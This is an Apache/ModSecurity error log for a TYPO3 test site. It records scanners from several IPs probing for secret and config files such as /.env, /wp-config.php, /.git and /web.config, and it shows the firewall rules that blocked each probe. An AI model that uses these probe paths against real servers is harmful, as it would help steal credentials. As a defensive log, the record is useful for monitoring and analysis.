[Sun Nov 09 07:12:01.563377 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAwsb7im4G1XUe_xNheLwAAAAM"]
[Sun Nov 09 07:12:01.563612 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAwsb7im4G1XUe_xNheLwAAAAM"]
[Sun Nov 09 07:12:01.989261 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAwsb7im4G1XUe_xNheMAAAAAM"]
[Sun Nov 09 07:12:01.991207 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAwsb7im4G1XUe_xNheMAAAAAM"]
[Sun Nov 09 07:12:01.991458 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAwsb7im4G1XUe_xNheMAAAAAM"]
[Sun Nov 09 07:12:02.311745 2025] [authz_core:error] [pid 4121445] [client 93.123.109.132:40598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Nov 09 07:12:02.737956 2025] [authz_core:error] [pid 4121445] [client 93.123.109.132:40598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 07:12:03.329767 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAws77im4G1XUe_xNheMwAAAAM"]
[Sun Nov 09 07:12:03.331683 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAws77im4G1XUe_xNheMwAAAAM"]
[Sun Nov 09 07:12:03.331946 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAws77im4G1XUe_xNheMwAAAAM"]
[Sun Nov 09 07:12:03.763440 2025] [authz_core:error] [pid 4121445] [client 93.123.109.132:40598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sun Nov 09 09:31:33.048770 2025] [authz_core:error] [pid 4125501] [client 54.159.162.148:50572] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 09:44:26.261835 2025] [authz_core:error] [pid 4125501] [client 213.209.157.81:43736] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 21:47:09.524857 2025] [:error] [pid 4121476] [client 45.80.158.128:36084] [client 45.80.158.128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRD9zRcnz15I8RMVIyazEQAAAAU"]
[Sun Nov 09 21:47:09.525164 2025] [:error] [pid 4121476] [client 45.80.158.128:36084] [client 45.80.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRD9zRcnz15I8RMVIyazEQAAAAU"]
[Sun Nov 09 21:47:09.525330 2025] [:error] [pid 4121476] [client 45.80.158.128:36084] [client 45.80.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRD9zRcnz15I8RMVIyazEQAAAAU"]
[Mon Nov 10 12:39:47.023908 2025] [:error] [pid 4146483] [client 204.76.203.25:49316] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHPAzpnbFjtMU_AVy8HVwAAAAQ"]
[Mon Nov 10 12:39:47.024164 2025] [:error] [pid 4146483] [client 204.76.203.25:49316] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHPAzpnbFjtMU_AVy8HVwAAAAQ"]
[Mon Nov 10 12:39:47.024334 2025] [:error] [pid 4146483] [client 204.76.203.25:49316] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHPAzpnbFjtMU_AVy8HVwAAAAQ"]
[Tue Nov 11 13:01:47.355193 2025] [:error] [pid 4171504] [client 62.60.131.162:58985] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aRMlq84ur4rH89nMKyc9ZwAAAAI"], referer: http://surf.test.indacotrentino.com/development/.env
[Tue Nov 11 13:01:47.355445 2025] [:error] [pid 4171504] [client 62.60.131.162:58985] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aRMlq84ur4rH89nMKyc9ZwAAAAI"], referer: http://surf.test.indacotrentino.com/development/.env
[Tue Nov 11 13:01:47.355619 2025] [:error] [pid 4171504] [client 62.60.131.162:58985] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aRMlq84ur4rH89nMKyc9ZwAAAAI"], referer: http://surf.test.indacotrentino.com/development/.env
[Tue Nov 11 13:01:49.606218 2025] [:error] [pid 4181590] [client 62.60.131.162:51035] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aRMlrXPGmA2XhoeufynuvgAAAAc"], referer: http://surf.test.indacotrentino.com/.env.config
[Tue Nov 11 13:01:49.606406 2025] [:error] [pid 4181590] [client 62.60.131.162:51035] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aRMlrXPGmA2XhoeufynuvgAAAAc"], referer: http://surf.test.indacotrentino.com/.env.config
[Tue Nov 11 13:01:49.606646 2025] [:error] [pid 4181590] [client 62.60.131.162:51035] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aRMlrXPGmA2XhoeufynuvgAAAAc"], referer: http://surf.test.indacotrentino.com/.env.config
[Tue Nov 11 13:01:49.606835 2025] [:error] [pid 4181590] [client 62.60.131.162:51035] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aRMlrXPGmA2XhoeufynuvgAAAAc"], referer: http://surf.test.indacotrentino.com/.env.config
[Tue Nov 11 13:01:53.099101 2025] [:error] [pid 4171513] [client 62.60.131.162:56814] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aRMlsQkntYMClcpdhnjxGgAAAAY"], referer: http://surf.test.indacotrentino.com/beta/.env
[Tue Nov 11 13:01:53.099327 2025] [:error] [pid 4171513] [client 62.60.131.162:56814] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aRMlsQkntYMClcpdhnjxGgAAAAY"], referer: http://surf.test.indacotrentino.com/beta/.env
[Tue Nov 11 13:01:53.099504 2025] [:error] [pid 4171513] [client 62.60.131.162:56814] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aRMlsQkntYMClcpdhnjxGgAAAAY"], referer: http://surf.test.indacotrentino.com/beta/.env
[Tue Nov 11 13:01:56.667304 2025] [:error] [pid 4182222] [client 62.60.131.162:60845] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aRMltIIaRTAbHY6AmuCWWgAAAAM"], referer: http://surf.test.indacotrentino.com/prod/.env
[Tue Nov 11 13:01:56.667589 2025] [:error] [pid 4182222] [client 62.60.131.162:60845] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aRMltIIaRTAbHY6AmuCWWgAAAAM"], referer: http://surf.test.indacotrentino.com/prod/.env
[Tue Nov 11 13:01:56.667788 2025] [:error] [pid 4182222] [client 62.60.131.162:60845] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aRMltIIaRTAbHY6AmuCWWgAAAAM"], referer: http://surf.test.indacotrentino.com/prod/.env
[Tue Nov 11 19:35:59.860348 2025] [:error] [pid 4187672] [client 62.60.131.162:59608] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCD_9n1sJ-njZs70xwmAAAAAU"]
[Tue Nov 11 19:35:59.861718 2025] [:error] [pid 4187672] [client 62.60.131.162:59608] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCD_9n1sJ-njZs70xwmAAAAAU"]
[Tue Nov 11 19:35:59.861920 2025] [:error] [pid 4187672] [client 62.60.131.162:59608] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCD_9n1sJ-njZs70xwmAAAAAU"]
[Tue Nov 11 19:35:59.943157 2025] [authz_core:error] [pid 4185599] [client 62.60.131.162:51801] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Nov 11 19:36:01.788224 2025] [:error] [pid 4182322] [client 62.60.131.162:54186] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCEcigdidSJZS2nZXttAAAAGU"]
[Tue Nov 11 19:36:01.788457 2025] [:error] [pid 4182322] [client 62.60.131.162:54186] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCEcigdidSJZS2nZXttAAAAGU"]
[Tue Nov 11 19:36:01.788616 2025] [:error] [pid 4182322] [client 62.60.131.162:54186] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCEcigdidSJZS2nZXttAAAAGU"]
[Tue Nov 11 19:36:01.802288 2025] [authz_core:error] [pid 4188369] [client 62.60.131.162:65398] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Tue Nov 11 19:36:01.804183 2025] [:error] [pid 4185599] [client 62.60.131.162:65411] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCEZ_5RQOOx5bVwaq58QAAAAA"]
[Tue Nov 11 19:36:01.804427 2025] [:error] [pid 4185599] [client 62.60.131.162:65411] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCEZ_5RQOOx5bVwaq58QAAAAA"]
[Tue Nov 11 19:36:01.804603 2025] [:error] [pid 4185599] [client 62.60.131.162:65411] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCEZ_5RQOOx5bVwaq58QAAAAA"]
[Tue Nov 11 19:36:01.806553 2025] [:error] [pid 4188368] [client 62.60.131.162:54201] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCEUYXkTqgv48mPPt-CwAAAAY"]
